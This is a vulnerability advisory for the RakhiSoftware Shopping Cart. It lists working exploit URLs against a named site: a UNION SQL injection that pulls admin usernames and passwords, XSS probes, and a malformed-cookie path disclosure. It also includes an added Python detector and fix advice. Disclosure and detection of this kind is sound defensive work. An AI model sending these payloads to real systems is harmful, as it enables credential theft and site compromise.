Application: RakhiSoftware Shopping Cart
Vendor Name: RakhiSoftware
Vendor URL: http://willscript.com/
Bug Type: Multiple Vulnerabilities (SQL Injection, XSS, Full Path Disclosure)
SQL Injection via category_id:
http://willscript.com/rjbike_new/product.php?category_id=1+union%20select%201,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20admin--&subcategory_id=1
Cross-Site Scripting via category_id and subcategory_id:
http://willscript.com/rjbike_new/product.php?category_id=>'>&subcategory_id=1
http://willscript.com/rjbike_new/product.php?category_id=1&subcategory_id=>'>
Full Path Disclosure on every page, triggered by sending a malformed session cookie:
Cookie: PHPSESSID='
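Detection logic for the three issues above, added here as an example that is not part of the original advisory: it walks constructed request records (hypothetical sample data, not traffic from willscript.com), URL-decodes the query string, and flags the integer parameters category_id and subcategory_id whenever they carry SQL or HTML metacharacters, plus a PHPSESSID cookie outside PHP's session-id alphabet. The underlying fix in product.php is to cast those ids to integers, bind them in prepared statements and HTML-escape anything reflected into the page.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory shows being injected; product.php expects integers here.
NUMERIC_PARAMS = {"category_id", "subcategory_id"}
SQLI_RE = re.compile(r"\b(union|select|concat|from)\b|--", re.IGNORECASE)
XSS_RE = re.compile(r"[<>'\"]")
SESSID_RE = re.compile(r"^[A-Za-z0-9,-]+$")  # characters PHP uses in session ids

# Constructed sample requests: (request path with query string, Cookie header or "").
SAMPLE_REQUESTS = [
    ("/rjbike_new/product.php?category_id=1&subcategory_id=1", "PHPSESSID=abc123"),
    ("/rjbike_new/product.php?category_id=1+union%20select%201,2,3%20from%20admin--"
     "&subcategory_id=1", "PHPSESSID=abc123"),
    ("/rjbike_new/product.php?category_id=%3E'%3E&subcategory_id=1", ""),
    ("/rjbike_new/product.php?category_id=1&subcategory_id=1", "PHPSESSID='"),
]


def classify_request(path, cookie):
    """Return a list of (finding, parameter) tuples; an empty list means clean."""
    findings = []
    query = urlsplit(path).query
    # parse_qsl percent-decodes each value and turns '+' into a space.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name not in NUMERIC_PARAMS:
            continue
        if value.strip().isdigit():
            continue  # an integer id, exactly what the application expects
        if SQLI_RE.search(value):
            findings.append(("sqli", name))
        elif XSS_RE.search(value):
            findings.append(("xss", name))
        else:
            findings.append(("non-numeric", name))
    # A session id that is not in PHP's alphabet is the FPD probe from the advisory.
    for part in cookie.split(";"):
        key, _, val = part.strip().partition("=")
        if key == "PHPSESSID" and not SESSID_RE.match(val):
            findings.append(("fpd-probe", "PHPSESSID"))
    return findings


def scan(requests=SAMPLE_REQUESTS):
    """Classify every request; returns one findings list per request, in order."""
    return [classify_request(path, cookie) for path, cookie in requests]


if __name__ == "__main__":
    for (path, cookie), hits in zip(SAMPLE_REQUESTS, scan()):
        print(path, repr(cookie), hits or "clean")
```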
Credits:
Charalambous Glafkos
Email: glafkos (at) astalavista (dot) com
___________________________________________
ASTALAVISTA - the hacking & security community
www.astalavista.com
www.astalavista.net
Best Regards,
Charalambous Glafkos ( nowayout )